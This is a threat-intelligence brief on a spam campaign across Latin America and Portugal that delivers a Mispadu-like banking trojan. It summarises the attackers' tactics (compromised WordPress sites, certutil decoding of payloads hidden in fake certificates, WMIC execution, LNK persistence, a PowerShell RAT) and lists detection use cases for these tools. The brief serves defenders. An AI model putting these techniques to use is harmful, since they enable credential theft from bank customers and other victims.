An Extensive Infection Campaign Across LATAM
Category: Threat Actor Activity | Industries: Education, Entertainment, Financial Services, Government, Media, Retail, Technology | Level: Tactical | Source: Metabase
The Metabase Q’s Threat Intelligence Team analyzed 20 different spam campaigns targeting entities in Chile, Mexico, Peru, and Portugal identifying a large-scale credential-stealing campaign likely distributing malware resembling the Mispadu banking trojan. The campaign, active since August 2022, has been targeting organizations associated with internet banking, education, government services, social networking, gaming, retail, and technology. "In several cases, the cyber criminals created fake webpages for the victim, such as online banking windows. For the initial infection, the attackers tried to lure the victims into opening different types of fake bills via HTML pages or PDF password-protected files," as shared by the Metabase Q Team. The campaign is revealed to have compromised "a total of 90,518 credentials coming from 17,595 unique websites across all industry sectors."
Compromising legitimate websites and using them as Command & Control servers are one of their primary strategies for propagating malware. To execute this campaign, the threat actors scout for vulnerable Content Management System versions, such as WordPress, and exploit them to take control of websites. With this control, they spread malware in a tailored fashion, including excluding specific countries, delivering distinct malware types according to the infected country, and even the installation of a specific malicious RAT (Remote Administration Tool) based on the device. The malware does not install if the host is a mobile device. A muti-stage infection chain highlights the campaign’s potency, "the cyber criminals hide the malware inside of fake certificates so it’s harder to detect. They then misuse a legitimate windows program 'certutil' to decode and execute the banking trojan." Following the decoding of the initial weaponized payload, WMIC is used to execute Mispadu with persistence established from a shortcut/LNK file and a PowerShell-based remote access trojan (RAT).
- Decoded Payload Establishes Persistence & Downloads/Run Payload
Anvilogic Use Cases:
- Certutil De-Obfuscate/Decode Files
- WinRM Tools
- Invoke-WebRequest Command